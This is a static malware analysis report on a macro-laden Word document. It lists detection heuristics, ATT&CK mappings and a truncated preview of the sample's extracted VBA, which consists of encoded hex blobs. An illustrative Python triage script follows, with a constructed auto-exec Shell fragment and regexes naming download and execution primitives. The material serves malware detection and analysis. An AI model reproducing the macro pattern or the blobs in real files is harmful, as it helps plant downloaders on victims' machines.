Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e86b59a806910e2d…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 143.5 KB
Created: 2018-03-21 22:52:00
Authoring application: Microsoft Office Word
First seen: 2018-11-05
MD5: 4e3fab21a063150233e4780b8c4bb61f
SHA-1: 02f535684a147dc5c1657459833b3b7bd9d480a7
SHA-256: e86b59a806910e2d7d901f50085d78305dbb8f18eafde4e4f6b4c0153e0c7017
Risk score: 264

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution
Note: every heuristic below describes macro-based execution; none of them indicates exploitation of a parser or application vulnerability, so T1203 is the weakest of the three mappings.

The sample is a Word document (the authoring application is Microsoft Office Word and the extracted module is ThisDocument, with VB_Base "1Normal.ThisDocument") whose macro project contains VBA with auto-execution entry points: the heuristics flag both a Document_Open and a Workbook_Open handler. The critical OLE_VBA_SHELL finding indicates a call to the VBA Shell() function, the usual primitive for launching a downloaded or dropped second-stage payload. The ClamAV signature Xls.Malware.Cwsp-6735643-0 independently classifies the file as malicious (the Xls. prefix is part of the signature name; the container metadata identifies a Word document). No specific malware family was attributed. The combination of an auto-exec trigger, a Shell() call and heavily encoded string constants in the macro source is the pattern of a downloader or initial-access stage.

Heuristics (8)

  • ClamAV: Xls.Malware.Cwsp-6735643-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected [medium] OLE_VBA_MACROS (4 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro source calls the VBA Shell() function, which starts an arbitrary process from the document.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open event handler: Word runs it as soon as the document is opened, provided macros are enabled.
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    Workbook_Open event handler: the Excel auto-execution entry point, found here in a Word-authored document.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) / cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only macro documents and documents whose source extraction failed, where no visible source is available.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI, present in ordinary Office files that contain drawing content; it is not a contact address and not an indicator of compromise.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                  Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)     18798 bytes
SHA-256: 10b135242041643c577e6025c9739593cf65f9debff015026c8ed23d0a56b9a2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 66 long base64-like blob(s). The blobs visible in the preview below consist only of hexadecimal digits (0-9, A-F), which the base64-like character class also matches, so treat the count as an encoded-string indicator rather than as evidence of base64 specifically.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit


Public Sub E_ZT()
   Dim QI_AEG As String
   Dim IS_HTV As String
   Dim L_IB As String
L_IB = "5788761D4257575720577B575777575A5757577C9646524A5757494A575786272D4E8A317C575745573A57885D5757592D57571E51578A4E445A5C935757834D6C57575720405633574F57245757955757575730572057856B78573A788A8A5757753457795751575E578C1A577E5782576F57572A6A576357405F5"
Dim T_VG As String
T_VG = "753345738577D6C615757576557575757575757752057967C57573651755757411C6C5585295D572357532933575757715757574E345757576A573E5D575757574457576A5457577B5757316A571C57578269353957395757879163575757578F4779956257848D575757245757605757836655963A935757575757"
Dim C_PE As String
C_PE = "577B575723573A625788575757571C2C2D4C3F5777975757966D5757578E4757573C57571857323D747D576A5757575757575757571B441E89896486575757578B418957272C7C32198E57574C725757573234575757573857575757571857579132335757729657912157572E5757578C575B4E577E692D39573C6"
Dim R_EM As String
R_EM = "46157705757577B57575757742F2D612E1D339057623671575767402A571E88244D4A88573B3A574A575757345737573452281D24921942677657787D68572F963E57917D5757578F8E578457574757575757825757485D576A75573B57574357575257574524341A575757574857726E575796835777572B574E57"
Dim HF_AEG As String
HF_AEG = "572C57582D576A5757755772575784576F57578640366C57575757575767841A576258575332205757675757261C715830578D2757873957853E57573757576357576B57576F54965790575790576A57574A5775294757363157577A575757207F83971D5757645057574557573757576B91576C57576C908B90576"
Dim GY_ET As String
GY_ET = "0337157299251251E6557225757341A5C5757576C27405E8B6691574257522557578D5757573B57571D575786303A8C6A4B579557572448735744574B575757573A576E578F57752D572157571C4E6E7C57716057295781824657573D57575D2757637F5757578B5780574F1A5757575781571A7F66842957572E61"
Dim C_T As String
C_T = "577D575557578A5257578857573F69577E575766195757575733525757575747905752565577573E57761C57575C57577357577C4C705A573696345757856257575740964D85575757743C57925770575729575B425770575879224A574F3057577C76579634576F5757575F1B706B2957515784575757575724575"
Dim ZT_LWS As String
ZT_LWS = "7383D245A5778575775575A576F835757577657571C57783F6657572857572F837C571C925770834B5C8D57633F1A575757365719333E5732525784575757565818819757576657571A575757577A57572D6756575757805777775759233F578B1D577C5B576284578B505757575D57577442574257245769575789"
Dim IW_P As String
IW_P = "72197D575757574C577B1D572B8D1F57245732575757578F8657573C2A572B572A5725587E575A5757677157575757576F9421572E215757578B3A576744576C80573337577657523F31572C4A7B575A32755757575741747F57458D57578F96575A455786265757577057558857435757575740575757573648975"
Dim BAL_WTG As String
BAL_WTG = "779576691574D575757675725574B4337571919575757578A576A50575757572147577357575757526A49573A335757895757344757578E33931E645790575777571B57535748578223668057576F57576E57572B6457578B57622A5757555A7A2F1984578757573C5793574F577951575857573F57825757572637"
Dim IXT_FW As String
IXT_FW = "5757579457645757553C574E388C835757205759575727925857533F575729575757433357585796878F575771578357575757572D574D379449545729306C572A4C5757606719578A40578A5738916157575757575757752457571C57856F3B88923D5A57814D57892D5757575A5728BA578E705757574754577C5"
Dim XIH_ZM As String
XIH_ZM = "7579266851F574E8237847A628C57575757591E575757575744574D576549578D57572D574F7F2157572C578A225757575757572E865757575745713E977E3C57578F5757965757335757305792755757745757205757938C39574357806889956E7857576EC757515757508557573A964B5757576B225723575755"
Dim S_PX As String
S_PX = "5757553B573F571E3D596F57576957535757576B5D575657965757642457576257245757615797183370574E57819257192B85575757815757847057573057576F6C5D5758823E1B6A4291645760577C3C9523576B57575B5767577E3F1E78586B57573C57575757816057673457755757575425265B575719615757576457515757811B5857578C57577E57578D575F574B473C4A5C574E573A6C57574557571C2E3B575757
... (truncated)
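The following Python script is an added illustration written for this page; it is not part of the report and not the analysis engine's code. It reimplements, over decoded VBA source such as the macros.bas artifact extracted by oletools' olevba, the kind of checks behind the OLE_VBA_DOCOPEN, OLE_VBA_WBOPEN, OLE_VBA_SHELL and encoded-blob findings above, and shows why a hex-only string literal trips a base64-like detector. The VBA fragment, the Decode() helper, the Document_Open body and the HEX_BLOB constant are constructed for the example and are not the sample's code.

```python
import json
import re
from collections import Counter

# Constructed for this example: a hex-only string literal in the style of the
# extracted macro. It is NOT the sample's data and decodes to nothing meaningful.
HEX_BLOB = ("5788761D4257575720577B575777575A5757577C9646524A5757494A5757"
            "86272D4E8A317C575745573A57885D5757592D57")

# Constructed VBA fragment (hypothetical): an auto-exec handler that calls a
# routine which passes a decoded string to Shell(). Decode() is invented.
SAMPLE_VBA = (
    'Attribute VB_Name = "ThisDocument"\n'
    'Attribute VB_Base = "1Normal.ThisDocument"\n'
    'Option Explicit\n\n'
    'Private Sub Document_Open()\n'
    '    E_ZT\n'
    'End Sub\n\n'
    'Public Sub E_ZT()\n'
    '    Dim L_IB As String\n'
    f'    L_IB = "{HEX_BLOB}"\n'
    '    Shell Decode(L_IB), vbHide\n'
    'End Sub\n'
)

# Auto-execution entry points for Word and Excel macro projects.
AUTOEXEC_RE = re.compile(
    r'\bSub\s+(AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|'
    r'Document_Close|Workbook_Open)\b', re.I)
# Process-launch, object-creation and download primitives.
EXEC_RE = re.compile(
    r'\b(Shell|CreateObject|WScript\.Shell|URLDownloadToFile|XMLHTTP|'
    r'ADODB\.Stream|powershell|cmd\.exe)\b', re.I)
# Quoted string literals of 40+ characters: candidate encoded payload chunks.
LITERAL_RE = re.compile(r'"([^"\r\n]{40,})"')
HEX_RE = re.compile(r'\A[0-9A-Fa-f]+\Z')
B64_RE = re.compile(r'\A[A-Za-z0-9+/]+={0,2}\Z')


def long_literals(src):
    """Return every long quoted string literal in the VBA source."""
    return LITERAL_RE.findall(src)


def classify_blob(blob):
    """Hex is checked first: the hex alphabet is a subset of the base64 one."""
    if HEX_RE.match(blob) and len(blob) % 2 == 0:
        return "hex"
    if B64_RE.match(blob):
        return "base64-like"
    return "other"


def hex_blob_stats(blob):
    """Decode a hex blob and summarise it; a dominant byte hints at XOR/padding."""
    data = bytes.fromhex(blob)
    top_byte, top_count = Counter(data).most_common(1)[0]
    printable = sum(32 <= b < 127 for b in data) / len(data)
    return {"bytes": len(data), "top_byte": top_byte,
            "top_count": top_count, "printable_ratio": round(printable, 2)}


def triage_vba(src):
    """Emit report-style tags and a verdict for decoded VBA source."""
    autoexec = sorted({m.group(1).lower() for m in AUTOEXEC_RE.finditer(src)})
    exec_tokens = sorted({m.group(1).lower() for m in EXEC_RE.finditer(src)})
    blobs = long_literals(src)
    blob_kinds = Counter(classify_blob(b) for b in blobs)
    tags = ["OLE_VBA_MACROS"] if re.search(r'\b(Sub|Function)\b', src, re.I) else []
    if "document_open" in autoexec:
        tags.append("OLE_VBA_DOCOPEN")
    if "workbook_open" in autoexec:
        tags.append("OLE_VBA_WBOPEN")
    if set(autoexec) - {"document_open", "workbook_open"}:
        tags.append("OLE_VBA_AUTOEXEC")
    if "shell" in exec_tokens:
        tags.append("OLE_VBA_SHELL")
    if set(exec_tokens) & {"createobject", "wscript.shell", "urldownloadtofile",
                           "xmlhttp", "adodb.stream", "powershell", "cmd.exe"}:
        tags.append("OLE_VBA_DOWNLOAD_OR_OBJECT")
    if blobs:
        tags.append("OLE_VBA_ENCODED_STRINGS")
    # An auto-exec trigger plus an execution primitive is the downloader pattern
    # the report's heuristics escalate on; either alone is only suspicious.
    executes = "OLE_VBA_SHELL" in tags or "OLE_VBA_DOWNLOAD_OR_OBJECT" in tags
    if autoexec and executes:
        verdict = "likely-malicious"
    elif autoexec or executes or blobs:
        verdict = "suspicious"
    else:
        verdict = "no-static-indicators"
    return {"autoexec": autoexec, "exec_tokens": exec_tokens,
            "blob_kinds": dict(blob_kinds), "tags": tags, "verdict": verdict}


if __name__ == "__main__":
    print(json.dumps(triage_vba(SAMPLE_VBA), indent=2))
    print(json.dumps(hex_blob_stats(HEX_BLOB)))
```

Point it at real olevba output by replacing SAMPLE_VBA with the decoded source; the blob classification is what separates "66 base64-like blobs" from "66 hex-encoded chunks", and hex_blob_stats() is the first step toward recovering what those chunks decode to.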